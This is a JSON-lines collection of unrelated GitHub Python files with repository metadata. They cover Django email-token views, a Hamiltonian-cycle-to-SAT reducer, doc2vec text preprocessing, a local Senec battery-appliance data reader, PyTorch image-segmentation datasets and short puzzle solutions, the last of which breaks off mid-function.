'api/verify_email_successful.html', context)\r\n else:\r\n return HttpResponseBadRequest()\r\n\r\ndef client_email_reset(request):\r\n user_token = request.GET.get(\"token\", None)\r\n context = {\r\n \"url\": settings.HOSTING_URL,\r\n \"token\": user_token\r\n }\r\n if not user_token:\r\n return render(request, 'api/verify_invalid_token.html', context)\r\n\r\n try:\r\n token = EmailVerificationToken.objects.reset_email_verification_token(user_token)\r\n except EmailVerificationTokenInvalid:\r\n # The token is invalid\r\n return render(request, 'api/verify_invalid_token.html', context)\r\n\r\n if not token.is_verified:\r\n token.send_verification_email()\r\n\r\n return render(request, 'api/verify_email_resend.html', context)\r\n","repo_name":"FengxiangZhao/Eculid_Rideshare","sub_path":"yida_project/euclid/euclid_verification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22855979392","text":"import networkx as nx\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sat_to_3sat import *\n\n\nclass DHCtoSAT:\n\n def __init__(self, adjacency_list, directed=False, dimacs=False):\n\n self.formula = []\n\n if directed:\n self.graph_type = nx.DiGraph\n else:\n self.graph_type = nx.Graph\n\n self.G = nx.to_networkx_graph(adjacency_list, create_using=self.graph_type)\n\n self.literals = self.get_literals(adjacency_list)\n\n if dimacs:\n self.dimacs_dict = self.get_dimacs_dict(self.literals)\n else:\n self.dimacs_dict = None\n\n @staticmethod\n def get_literals(adj_list):\n return [(idx[0] + 1, idx[1] + 1) for idx, x in np.ndenumerate(adj_list) if x == 1]\n\n @staticmethod\n def get_dimacs_dict(literal_list):\n a = {x: i + 1 for i, x in enumerate(literal_list)}\n b = {(x[0] * -1, x[1] * -1): (i + 1) * -1 for i, x in enumerate(literal_list)}\n a.update(b)\n return a\n\n def add_to_formula(self, clause):\n self.formula.append(clause)\n\n @staticmethod\n def print_formula(G, formula, dimacs_dict=None):\n if dimacs_dict is not None:\n print('p cnf {} {}'.format(len(G.nodes()), len(formula)))\n for clause in formula:\n for i, literal in enumerate(clause):\n if i < len(clause) - 1:\n if dimacs_dict is not None:\n print('{}'.format(literal), end=' ')\n else:\n #print('{} V'.format(literal), end=' ')\n if literal[0] < 0:\n print('\\\\neg e_{' + str(literal[0]*-1) + ',' + str(literal[1]*-1) + '} \\\\vee', end=' ')\n else:\n print('e_{' + str(literal[0]) + ',' + str(literal[1]) + '} \\\\vee', end=' ')\n else:\n if dimacs_dict is not None:\n print('{} 0'.format(literal))\n else:\n # print('{}'.format(literal))\n if literal[0] < 0:\n print('\\\\neg e_{' + str(literal[0] * -1) + ',' + str(literal[1] * -1) + '} \\\\wedge')\n else:\n print('e_{' + str(literal[0]) + ',' + str(literal[1]) + '} \\\\wedge')\n\n\n def plot(self):\n nx.draw(self.G, with_labels=True, font_weight='bold')\n plt.show()\n\n def no_close_loop(self):\n for x in self.literals:\n for y in self.literals:\n if x[0] == y[1] and x[1] == y[0]:\n if self.dimacs_dict is not None:\n self.add_to_formula(\n [self.dimacs_dict[(x[0] * -1, x[1] * -1)], self.dimacs_dict[(y[0] * -1, y[1] * -1)]])\n else:\n self.add_to_formula([(x[0] * -1, x[1] * -1), (y[0] * -1, y[1] * -1)])\n\n def no_duplicate_head(self):\n for x in self.literals:\n for y in self.literals:\n if x[0] == y[0] and x[1] != y[1]:\n if self.dimacs_dict is not None:\n self.add_to_formula(\n [self.dimacs_dict[(x[0] * -1, x[1] * -1)], self.dimacs_dict[(y[0] * -1, y[1] * -1)]])\n else:\n self.add_to_formula([(x[0] * -1, x[1] * -1), (y[0] * -1, y[1] * -1)])\n\n def no_duplicate_tail(self):\n for x in self.literals:\n for y in self.literals:\n if x[0] != y[0] and x[1] == y[1]:\n if self.dimacs_dict is not None:\n self.add_to_formula(\n [self.dimacs_dict[(x[0] * -1, x[1] * -1)], self.dimacs_dict[(y[0] * -1, y[1] * -1)]])\n else:\n self.add_to_formula([(x[0] * -1, x[1] * -1), (y[0] * -1, y[1] * -1)])\n\n def one_outgoing_edge(self):\n for i, x in enumerate(self.literals):\n curr = []\n for y in self.literals:\n if i == y[0]:\n curr.append(y)\n if len(curr) == 1:\n if self.dimacs_dict is not None:\n self.add_to_formula([self.dimacs_dict[curr[0]]])\n else:\n self.add_to_formula(curr)\n else:\n if len(curr) != 0:\n if self.dimacs_dict is not None:\n for j, literal in enumerate(curr):\n curr[j] = self.dimacs_dict[literal]\n self.add_to_formula(curr)\n\n def convert(self):\n self.no_close_loop()\n self.no_duplicate_head()\n self.no_duplicate_tail()\n self.one_outgoing_edge()\n\n\na = np.array([\n [0, 1, 0, 0],\n [1, 0, 1, 1],\n [1, 0, 0, 1],\n [0, 0, 1, 0]\n])\n\nb = np.array([\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 0, 1, 1, 1],\n [1, 1, 1, 1, 0, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n])\n\nc = np.array([\n [0, 1, 0, 0, 1, 1],\n [1, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1],\n [0, 0, 1, 0, 1, 1],\n [0, 1, 0, 0, 1, 1],\n [0, 1, 0, 0, 1, 1]\n])\n\nd = np.array([\n [0, 1, 0, 1, 0, 1, 0],\n [0, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 1],\n [1, 1, 0, 0, 0, 0, 0]\n])\n\ne = np.array([\n [0, 1, 0, 1, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 1, 0, 1],\n [0, 0, 0, 0, 0, 1, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 1, 0, 1],\n [0, 0, 0, 0, 0, 1, 0, 1, 0]\n])\n\ndhc_to_sat = DHCtoSAT(e, directed=True, dimacs=True)\n#dhc_to_sat.plot()\nprint(dhc_to_sat.dimacs_dict)\ndhc_to_sat.convert()\ndhc_to_sat.print_formula(dhc_to_sat.G, dhc_to_sat.formula, dhc_to_sat.dimacs_dict)\nprint('--------------------')\n\nsat_to_3sat = SATto3SAT(dhc_to_sat.formula, dhc_to_sat.dimacs_dict)\nt_sat = sat_to_3sat.convert()\ndhc_to_sat.print_formula(dhc_to_sat.G, t_sat, sat_to_3sat.dimacs_dict)\n","repo_name":"mikepetersyn/dhcp_solving","sub_path":"dhc_to_sat.py","file_name":"dhc_to_sat.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11728425738","text":"import nltk\nimport glob\nfrom nltk import tokenize\nimport gensim\nimport re\nimport numpy as np\nfrom collections import OrderedDict\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.corpus import stopwords\nimport random\n\ndef read_data(files_loc, s_type='positive'):\n content_list = []\n tag_list = []\n s_tag_list = []\n tokenizer = tokenize.RegexpTokenizer(r'\\w+')\n files_loc = files_loc + \"*.txt\"\n stemmer = SnowballStemmer(\"english\")\n\n for f in glob.glob(files_loc):\n tag_list.append(f)\n s_tag_list.append(s_type) \n\n with open(f, 'r', encoding='utf-8') as text:\n raw = text.read()\n content = re.sub(r'\\d+', '', raw)\n content = tokenizer.tokenize(content)\n content = list(map(lambda x: x.lower(), content))\n content = list(map(lambda x: stemmer.stem(x), content))\n content = [word for word in content if word not in stopwords.words('english')]\n content_list.append(content)\n\n\n return content_list, tag_list, s_tag_list\n\ndef word_count(content_list):\n print(\"word count start.....\\n\")\n word_count_dict = OrderedDict()\n \n for content in content_list:\n for word in content:\n if word in word_count_dict:\n word_count_dict[word] += 1\n else:\n word_count_dict[word] = 1\n\n word_count_dict = OrderedDict(sorted(word_count_dict.items(), key=lambda x: -x[1]))\n \n # Generate a word key list, the order of keys is based on the frequency of words from most to least\n word_key_list = list(word_count_dict.keys()) \n\n return word_count_dict, word_key_list\n\n\n# This is NOT doc2vec\ndef docvec_generate(content_list, word_key_list):\n print(\"docvec generation start......\\n\")\n docvec_list = []\n\n for content in content_list:\n docvec = []\n for word in content:\n if word not in word_key_list:\n continue\n else:\n docvec.append(word_key_list.index(word))\n docvec_list.append(docvec)\n\n # return list of docvecs of all documents \n return docvec_list\n\ndef c2i(x):\n if(x == 'positive'):\n return 1\n else:\n return 0\n\ndef preprocessing():\n \n training_reading_done = True #False\n doc2vec = True #True\n testing_reading_done = False\n first_reading_done = True\n\n # global item initialization\n word_key_list = []\n content_list = []\n tag_list = []\n s_tag_list = []\n word_count_dict = {}\n\n if(training_reading_done == False and first_reading_done == False):\n print('first reading start......')\n train_pos = \"task1/train/positive/\"\n train_neg = \"task1/train/negative/\" \n pos_content_list, pos_tag_list, pos_s_tag_list = read_data(train_pos, \"positive\")\n neg_content_list, neg_tag_list, neg_s_tag_list = read_data(train_neg, \"negative\")\n #content\n content_list = pos_content_list + neg_content_list\n #file path and name\n tag_list = pos_tag_list + neg_tag_list\n #sentiment tag\n s_tag_list = pos_s_tag_list + neg_s_tag_list\n s_tag_list = np.array(list(map(c2i, s_tag_list)))\n \n np.save(\"content_list\", content_list)\n np.save(\"s_tag_list\", s_tag_list)\n np.save(\"tag_list\", tag_list)\n\n if(doc2vec == False and training_reading_done == False):\n # Naive docvec\n word_count_dict, word_key_list = word_count(content_list)\n docvec_list = docvec_generate(content_list, word_key_list)\n\n print(\"Naive preprocessing done, saving......\\n\")\n docvec_list = np.array(docvec_list)\n np.save(\"naive_docvec_list\", docvec_list)\n \n\n elif(doc2vec == True and training_reading_done == False):\n # docvec from doc2vec model\n tag_list = np.load('tag_list.npy', allow_pickle=True)\n content_list = np.load('content_list.npy', allow_pickle=True)\n assert(len(content_list) == len(tag_list))\n TaggedDocument = gensim.models.doc2vec.TaggedDocument\n documents = [TaggedDocument(content_list[i], [tag_list[i]]) for i in range(len(content_list))]\n\n print(\"Doc2Vec model training start......\")\n model = gensim.models.Doc2Vec(vector_size=600,\\\n sample=1e-3, window=15, min_count=3, workers=4, epochs=10)\n\n model.build_vocab(documents)\n\n def perm(docs):\n random.shuffle(docs)\n return docs\n\n for i in range(10):\n print('Epoch: ' + str(i))\n model.train(perm(documents), total_examples=model.corpus_count, epochs=1)\n\n print(\"Doc2vec preprocessing done, saving......\\n\")\n model.save('model_v600_w15.model')\n\n docvec_list = []\n for filename in tag_list:\n docvec = model.docvecs[filename]\n docvec_list.append(docvec)\n docvec_list = np.array(docvec_list)\n np.save(\"doc2vec_docvec_list\", docvec_list)\n\n\n #Generate Doc2Vec testing docvec\n if(testing_reading_done == False):\n if(doc2vec == True):\n model_loc = 'model_v600_w15.model'\n model = gensim.models.Doc2Vec.load(model_loc)\n\n #test1\n test1_loc = 'task1/test/'\n content_list, tag_list, s_tag_list = read_data(test1_loc)\n np.save('doc2vec_testing1_tag', tag_list)\n testing_docvec_list = []\n\n for content in content_list:\n docvec = model.infer_vector(content)\n testing_docvec_list.append(docvec)\n \n testing_docvec_list = np.array(testing_docvec_list)\n np.save(\"doc2vec_testing1\", testing_docvec_list)\n\n #test2\n test2_loc = 'data2_task2/test/'\n content_list, tag_list, s_tag_list = read_data(test2_loc)\n np.save('doc2vec_testing2_tag', tag_list)\n testing_docvec_list = []\n\n for content in content_list:\n docvec = model.infer_vector(content)\n testing_docvec_list.append(docvec)\n \n testing_docvec_list = np.array(testing_docvec_list)\n np.save(\"doc2vec_testing2\", testing_docvec_list)\n\n #Generate naive testing docvec\n if(doc2vec == False):\n test1_loc = 'task1/test/'\n test2_loc = 'data2_task2/test/'\n\n #test1 part \n content_list, tag_list, s_tag_list = read_data(test1_loc)\n tag_list = np.array(tag_list)\n np.save('naive_testing1_tag', tag_list)\n docvec_list = docvec_generate(content_list, word_key_list)\n print(\"Testing 1 docvec finished, saving......\\n\")\n docvec_list = np.array(docvec_list)\n np.save('naive_testing1', docvec_list)\n print(len(docvec_list))\n \n #test2 part\n content_list, tag_list, s_tag_list = read_data(test2_loc)\n tag_list = np.array(tag_list)\n np.save('naive_testing2_tag', tag_list)\n docvec_list = docvec_generate(content_list, word_key_list)\n print(\"Testing 2 docvec finished, saving......\\n\")\n docvec_list = np.array(docvec_list)\n np.save('naive_testing2', docvec_list)\n print(len(docvec_list))\n\n\ndef testing_doc_read():\n test1_loc = 'task1/test/'\n test2_loc = 'data2_task2/test/'\n content_list, tag_list, s_tag_list = read_data(test1_loc)\n np.save('testing1_content_list', content_list)\n content_list, tag_list, s_tag_list = read_data(test2_loc)\n np.save('testing2_content_list', content_list)\n\n\n#preprocessing()\n#testing_doc_read()","repo_name":"froyohunter/Machine-Learning-Sentiment-Binary-Classification","sub_path":"submission_3/code/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":7616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72998911233","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nLibrary to get a lot of useful data out of Senec appliances.\r\n\r\nTested with: SENEC.Home V3 hybrid duo (https://senec.com/de/produkte/senec-home-v3-hybrid)\r\n\r\nKudos:\r\n* SYSTEM_STATE_NAME taken from https://github.com/mchwalisz/pysenec\r\n\r\nhttps://gist.github.com/smashnet/82ad0b9d7f0ba2e5098e6649ba08f88a\r\n\"\"\"\r\nimport requests\r\nimport struct\r\nimport json\r\nimport sys\r\n\r\n__author__ = \"Nicolas Inden\"\r\n__copyright__ = \"Copyright 2020, Nicolas Inden\"\r\n__credits__ = [\"Nicolas Inden\", \"Mikołaj Chwalisz\"]\r\n__license__ = \"Apache-2.0 License\"\r\n__version__ = \"1.0.0\"\r\n__maintainer__ = \"Nicolas Inden\"\r\n__email__ = \"nico@smashnet.de\"\r\n__status__ = \"Production\"\r\n\r\nclass Senec():\r\n\r\n def __init__(self, device_ip):\r\n self.device_ip = device_ip\r\n self.read_api = f\"http://{device_ip}/lala.cgi\"\r\n \r\n def get_values(self):\r\n response = requests.post(self.read_api, json=BASIC_REQUEST)\r\n if response.status_code == 200:\r\n res = self.__decode_data(response.json())\r\n return self.__substitute_system_state(res)\r\n else:\r\n return {\"msg\": f\"Status code {response.status_code}\"}\r\n\r\n def get_all_values(self):\r\n request_json = {\"STATISTIC\": {},\"ENERGY\": {},\"FEATURES\": {},\"LOG\": {},\"SYS_UPDATE\": {},\"WIZARD\": {},\"BMS\": {},\"BAT1\": {},\"BAT1OBJ1\": {},\"BAT1OBJ2\": {},\"BAT1OBJ2\": {},\"BAT1OBJ3\": {},\"BAT1OBJ4\": {},\"PWR_UNIT\": {},\"PV1\": {},\"FACTORY\": {},\"GRIDCONFIG\": {}}\r\n response = requests.post(self.read_api, json=request_json)\r\n if response.status_code == 200:\r\n return self.__decode_data(response.json())\r\n else:\r\n return {\"msg\": f\"Status code {response.status_code}\"}\r\n\r\n def __decode_data(self, data):\r\n return { k: self.__decode_data_helper(v) for k, v in data.items() }\r\n\r\n def __decode_data_helper(self, data):\r\n if isinstance(data, str):\r\n return self.__decode_value(data)\r\n if isinstance(data, list):\r\n return [self.__decode_value(val) for val in data]\r\n if isinstance(data, dict):\r\n return { k: self.__decode_data_helper(v) for k, v in data.items() }\r\n\r\n def __decode_value(self, value):\r\n if value.startswith(\"fl_\"):\r\n return struct.unpack('!f', bytes.fromhex(value[3:]))[0]\r\n if value.startswith(\"u8_\"):\r\n return struct.unpack('!B', bytes.fromhex(value[3:]))[0]\r\n if value.startswith(\"i3_\") or value.startswith(\"i8_\") or value.startswith(\"u3_\") or value.startswith(\"u1_\"):\r\n return int(value[3:], 16)\r\n if value.startswith(\"st_\"):\r\n return value[3:]\r\n return value\r\n\r\n def __substitute_system_state(self, data):\r\n system_state = data['STATISTIC']['CURRENT_STATE']\r\n data['STATISTIC']['CURRENT_STATE'] = SYSTEM_STATE_NAME[system_state]\r\n return data\r\n\r\nBASIC_REQUEST = {\r\n 'STATISTIC': {\r\n 'CURRENT_STATE': '' # Current state of the system (int, see SYSTEM_STATE_NAME)\r\n #'LIVE_BAT_CHARGE_MASTER': '', # Battery charge amount since installation (kWh)\r\n #'LIVE_BAT_DISCHARGE_MASTER': '', # Battery discharge amount since installation (kWh)\r\n #'LIVE_GRID_EXPORT': '', # Grid export amount since installation (kWh)\r\n #'LIVE_GRID_IMPORT': '', # Grid import amount since installation (kWh)\r\n #'LIVE_HOUSE_CONS': '', # House consumption since installation (kWh)\r\n #'LIVE_PV_GEN': '', # PV generated power since installation (kWh)\r\n #'MEASURE_TIME': '' # Unix timestamp for above values (ms)\r\n },\r\n 'ENERGY': {\r\n #'GUI_BAT_DATA_CURRENT': '', # Battery charge current: negative if discharging, positiv if charging (A)\r\n 'GUI_BAT_DATA_FUEL_CHARGE': '', # Remaining battery (percent)\r\n 'GUI_BAT_DATA_POWER': '', # Battery charge power: negative if discharging, positiv if charging (W)\r\n #'GUI_BAT_DATA_VOLTAGE': '', # Battery voltage (V)\r\n 'GUI_GRID_POW': '', # Grid power: negative if exporting, positiv if importing (W)\r\n 'GUI_HOUSE_POW': '', # House power consumption (W)\r\n 'GUI_INVERTER_POWER': '' # PV production (W)\r\n #'STAT_HOURS_OF_OPERATION': '' # Appliance hours of operation\r\n },\r\n 'PV1': {\r\n #'MPP_CUR': '', # List: MPP current (A)\r\n 'MPP_POWER': '', # List: MPP power (W)\r\n #'MPP_VOL': '', # List: MPP voltage (V)\r\n 'POWER_RATIO': '' # Grid export limit (percent)\r\n #'P_TOTAL': '' # ?\r\n },\r\n 'BMS':{\r\n #'CHARGED_ENERGY': '', # List: Charged energy per battery\r\n #'DISCHARGED_ENERGY': '', # List: Discharged energy per battery\r\n #'CYCLES': '' # List: Cycles per battery\r\n 'CELL_TEMPERATURES_MODULE_A':'',\r\n 'CELL_TEMPERATURES_MODULE_B':'',\r\n 'CELL_TEMPERATURES_MODULE_C':'',\r\n 'CELL_TEMPERATURES_MODULE_D':'',\r\n 'CELL_VOLTAGES_MODULE_A':'',\r\n 'CELL_VOLTAGES_MODULE_B':'',\r\n 'CELL_VOLTAGES_MODULE_C':'',\r\n 'CELL_VOLTAGES_MODULE_D':''\r\n },\r\n 'FACTORY': {\r\n 'DESIGN_CAPACITY': '', # Battery design capacity (Wh)\r\n 'MAX_CHARGE_POWER_DC': '', # Battery max charging power (W)\r\n 'MAX_DISCHARGE_POWER_DC': '', # Battery max discharging power (W)\r\n 'DEVICE_ID':'' # Devise Serial #\r\n },\r\n 'WIZARD': {\r\n 'APPLICATION_VERSION': ''\r\n }\r\n\r\n}\r\n\r\nSYSTEM_STATE_NAME = {\r\n 0: \"INITIAL STATE\",\r\n 1: \"ERROR INVERTER COMMUNICATION\",\r\n 2: \"ERROR ELECTRICY METER\",\r\n 3: \"RIPPLE CONTROL RECEIVER\",\r\n 4: \"INITIAL CHARGE\",\r\n 5: \"MAINTENANCE CHARGE\",\r\n 6: \"MAINTENANCE READY\",\r\n \r\n 7: \"MAINTENANCE REQUIRED\",\r\n 8: \"MAN. SAFETY CHARGE\",\r\n 9: \"SAFETY CHARGE READY\",\r\n 10: \"FULL CHARGE\",\r\n 11: \"EQUALIZATION: CHARGE\",\r\n 12: \"DESULFATATION: CHARGE\",\r\n 13: \"BATTERY FULL\",\r\n 14: \"CHARGE\",\r\n 15: \"BATTERY EMPTY\",\r\n 16: \"DISCHARGE\",\r\n 17: \"PV + DISCHARGE\",\r\n 18: \"GRID + DISCHARGE\",\r\n 19: \"PASSIVE\",\r\n 20: \"OFF\",\r\n 21: \"OWN CONSUMPTION\",\r\n 22: \"RESTART\",\r\n 23: \"MAN. EQUALIZATION: CHARGE\",\r\n 24: \"MAN. DESULFATATION: CHARGE\",\r\n 25: \"SAFETY CHARGE\",\r\n 26: \"BATTERY PROTECTION MODE\",\r\n 27: \"EG ERROR\",\r\n 28: \"EG CHARGE\",\r\n 29: \"EG DISCHARGE\",\r\n 30: \"EG PASSIVE\",\r\n 31: \"EG PROHIBIT CHARGE\",\r\n 32: \"EG PROHIBIT DISCHARGE\",\r\n 33: \"EMERGANCY CHARGE\",\r\n 34: \"SOFTWARE UPDATE\",\r\n 35: \"NSP ERROR\",\r\n 36: \"NSP ERROR: GRID\",\r\n 37: \"NSP ERROR: HARDWRE\",\r\n 38: \"NO SERVER CONNECTION\",\r\n 39: \"BMS ERROR\",\r\n 40: \"MAINTENANCE: FILTER\",\r\n 41: \"SLEEPING MODE\",\r\n 42: \"WAITING EXCESS\",\r\n 43: \"CAPACITY TEST: CHARGE\",\r\n 44: \"CAPACITY TEST: DISCHARGE\",\r\n 45: \"MAN. DESULFATATION: WAIT\",\r\n 46: \"MAN. DESULFATATION: READY\",\r\n 47: \"MAN. DESULFATATION: ERROR\",\r\n 48: \"EQUALIZATION: WAIT\",\r\n 49: \"EMERGANCY CHARGE: ERROR\",\r\n 50: \"MAN. EQUALIZATION: WAIT\",\r\n 51: \"MAN. EQUALIZATION: ERROR\",\r\n 52: \"MAN: EQUALIZATION: READY\",\r\n 53: \"AUTO. DESULFATATION: WAIT\",\r\n 54: \"ABSORPTION PHASE\",\r\n 55: \"DC-SWITCH OFF\",\r\n 56: \"PEAK-SHAVING: WAIT\",\r\n 57: \"ERROR BATTERY INVERTER\",\r\n 58: \"NPU-ERROR\",\r\n 59: \"BMS OFFLINE\",\r\n 60: \"MAINTENANCE CHARGE ERROR\",\r\n 61: \"MAN. SAFETY CHARGE ERROR\",\r\n 62: \"SAFETY CHARGE ERROR\",\r\n 63: \"NO CONNECTION TO MASTER\",\r\n 64: \"LITHIUM SAFE MODE ACTIVE\",\r\n 65: \"LITHIUM SAFE MODE DONE\",\r\n 66: \"BATTERY VOLTAGE ERROR\",\r\n 67: \"BMS DC SWITCHED OFF\",\r\n 68: \"GRID INITIALIZATION\",\r\n 69: \"GRID STABILIZATION\",\r\n 70: \"REMOTE SHUTDOWN\",\r\n 71: \"OFFPEAK-CHARGE\",\r\n 72: \"ERROR HALFBRIDGE\",\r\n 73: \"BMS: ERROR OPERATING TEMPERATURE\",\r\n 74: \"FACOTRY SETTINGS NOT FOUND\",\r\n 75: \"BACKUP POWER MODE - ACTIVE\",\r\n 76: \"BACKUP POWER MODE - BATTERY EMPTY\",\r\n 77: \"BACKUP POWER MODE ERROR\",\r\n 78: \"INITIALISING\",\r\n 79: \"INSTALLATION MODE\",\r\n 80: \"GRID OFFLINE\",\r\n 81: \"BMS UPDATE NEEDED\",\r\n 82: \"BMS CONFIGURATION NEEDED\",\r\n 83: \"INSULATION TEST\",\r\n 84: \"SELFTEST\",\r\n 85: \"EXTERNAL CONTROL\",\r\n 86: \"ERROR: TEMPERATURESENSOR\",\r\n 87: \"GRID OPERATOR: CHARGE PROHIBITED\",\r\n 88: \"GRID OPERATOR: DISCHARGE PROHIBITED\",\r\n 89: \"SPARE CAPACITY\",\r\n 90: \"SELFTEST ERROR\",\r\n 91: \"EARTH FAULT\"\r\n}\r\n\r\nif __name__ == \"__main__\":\r\n api = Senec(\"192.168.1.9\")\r\n print(api.get_all_values())\r\n","repo_name":"Hobbyflyer/senec_monitoring","sub_path":"senec.py","file_name":"senec.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"5521073197","text":"import torch\nimport torch.utils.data as data\nimport torch.nn.functional as F\nimport torchvision.transforms.functional as TF\n\nfrom skimage import color\nfrom PIL.Image import BILINEAR\n\n\nclass TrainDataset(data.Dataset):\n\n def __init__(self, inputs, labels, length, im_size):\n super(TrainDataset, self).__init__()\n\n self.inputs = inputs\n self.labels = labels\n self.length = length\n self.size = im_size\n\n def spatial_transform(self, input1, label1):\n\n vflip = torch.rand(1).item() > 0.5\n hflip = torch.rand(1).item() > 0.5\n deg = torch.LongTensor(1).random_(-20, 20).item()\n scale = torch.FloatTensor(1).uniform_(0.8, 1.2)\n\n image_list = [input1, label1]\n for i, p in enumerate(image_list):\n dtype = p.dtype\n\n p_min = p.min()\n p_max = p.max()\n\n p = (p - p_min) / ((p_max - p_min) + 0.001)\n\n p = TF.to_pil_image(p.float())\n if vflip:\n p = TF.vflip(p)\n if hflip:\n p = TF.hflip(p)\n\n p = TF.affine(p, deg, scale=scale, translate=(0, 0), shear=0, resample=BILINEAR)\n p = TF.to_tensor(p).squeeze()\n\n p = (p * ((p_max - p_min) + 0.001)) + p_min\n\n if dtype == torch.int64:\n p = p.round()\n p = p.to(dtype=dtype)\n\n image_list[i] = p.clone()\n\n input1, mask = image_list\n\n return input1, mask\n\n def __getitem__(self, item):\n # # #\n # import matplotlib\n # matplotlib.use('qt5agg')\n # import matplotlib.pyplot as plt\n # plt.ion()\n idx = item % self.length\n\n input1 = self.inputs[idx]\n label1 = self.labels[idx]\n\n if any([x < self.size for x in list(input1.shape[1:3])]):\n size_diff = torch.tensor([input1.shape[0], self.size, self.size]) - torch.tensor(input1.shape)\n size_diff[size_diff < 0.0] = 0.0\n pad = (size_diff[2] // 2, size_diff[2] // 2 + size_diff[2] % 2,\n size_diff[1] // 2, size_diff[1] // 2 + size_diff[1] % 2)\n input1 = F.pad(input1, pad)\n label1 = F.pad(label1, pad)\n\n temp = torch.zeros((self.size, self.size))\n\n while temp.sum() == 0.0:\n if input1.shape[2] == self.size:\n x = 0\n else:\n x = torch.randint(0, (input1.shape[2] - self.size), (1,)).item()\n\n if input1.shape[1] == self.size:\n y = 0\n else:\n y = torch.randint(0, (input1.shape[1] - self.size), (1,)).item()\n temp = label1[y: y + self.size, x: x + self.size]\n\n input1 = input1[:, y: y + self.size, x: x + self.size]\n label1 = label1[y: y + self.size, x: x + self.size]\n\n # Spatially trasform the source and target\n input1, mask = self.spatial_transform(input1, label1.long())\n # mask = torch.round(mask)\n\n input_hsv = torch.from_numpy(color.rgb2hsv(input1.permute(1, 2, 0).numpy())).permute(2, 0, 1)\n\n inputs = torch.cat([input1, input_hsv], dim=0)\n\n return inputs.float(), mask.long()\n\n def __len__(self):\n return self.length\n\n\nclass EvalDataset(data.Dataset):\n def __init__(self, inputs, labels, length, im_size):\n super(EvalDataset, self).__init__()\n\n self.inputs = inputs\n self.labels = labels\n self.length = length\n self.size = im_size\n\n def __getitem__(self, item):\n\n input1 = self.inputs[item]\n label1 = self.labels[item]\n\n if any([x < self.size for x in list(input1.shape[1:3])]):\n size_diff = torch.tensor([input1.shape[0], self.size, self.size]) - torch.tensor(input1.shape)\n size_diff[size_diff < 0.0] = 0.0\n pad = (size_diff[2] // 2, size_diff[2] // 2 + size_diff[2] % 2,\n size_diff[1] // 2, size_diff[1] // 2 + size_diff[1] % 2)\n input1 = F.pad(input1, pad)\n\n temp = torch.zeros((self.size, self.size))\n\n while temp.sum() == 0.0:\n x = torch.randint(0, (input1.shape[2] - self.size), (1,)).item()\n y = torch.randint(0, (input1.shape[1] - self.size), (1,)).item()\n temp = label1[y: y + self.size, x: x + self.size]\n\n input1 = input1[:, y: y + self.size, x: x + self.size]\n label1 = label1[y: y + self.size, x: x + self.size]\n\n input_hsv = torch.from_numpy(color.rgb2hsv(input1.permute(1, 2, 0).numpy())).permute(2, 0, 1)\n\n inputs = torch.cat([input1, input_hsv], dim=0)\n\n return inputs.float(), label1.long()\n\n def __len__(self):\n return self.length()\n","repo_name":"blakezim/MR_Hist","sub_path":"Histology/NNSeg/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43142654680","text":"# https://leetcode.com/problems/chalkboard-xor-game/discuss/190068/O(n)-simple-python3-with-explanation-beats-100\n\nclass Solution(object):\n def xorGame(self, nums):\n\n r_xor = 0\n for num in nums:\n r_xor = r_xor ^ num\n \n if r_xor == 0:\n # if xor of all elements is 0, then Alice wins\n return True\n \n # Alice wins if and only if there is an even number of numbers\n return len(nums) % 2 == 0","repo_name":"hardik302001/leetcode","sub_path":"problems/chalkboard_xor_game/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23627301921","text":"def explode(s, c):\r\n t = []\r\n s += c;\r\n p = 0;\r\n for i in range(len(s)):\r\n if (s[i] == c or s[i] == \"\\n\") and s[p:i] != \"\" and s[p:i] != \"\\n\":\r\n t.append(s[p:i])\r\n p = i + 1\r\n return t\r\n\r\ndef explodeToInt(s, c):\r\n a = explode(s, c)\r\n for i in range(len(a)): a[i] = int(a[i])\r\n return a\r\n\r\ndef timeToN(n, C, a, s):\r\n time = s * (n / C)\r\n for i in range(n % C): time += a[i]\r\n return time * 2\r\n\r\ndef solveCase(line):\r\n data = explodeToInt(line, \" \")\r\n L = data[0]\r\n t = data[1]\r\n N = data[2]\r\n C = data[3]\r\n a = data[4:]\r\n s = sum(a)\r\n for i in range(len(a), N):\r\n a.append(a[i % C])\r\n\r\n saved = []\r\n b1 = False\r\n for i in range(len(a)):\r\n if b1: saved.append(a[i])\r\n else:\r\n time = timeToN(i+1, C, a, s)\r\n if time >= t:\r\n b1 = True\r\n saved.append((time - t)/2)\r\n else:\r\n 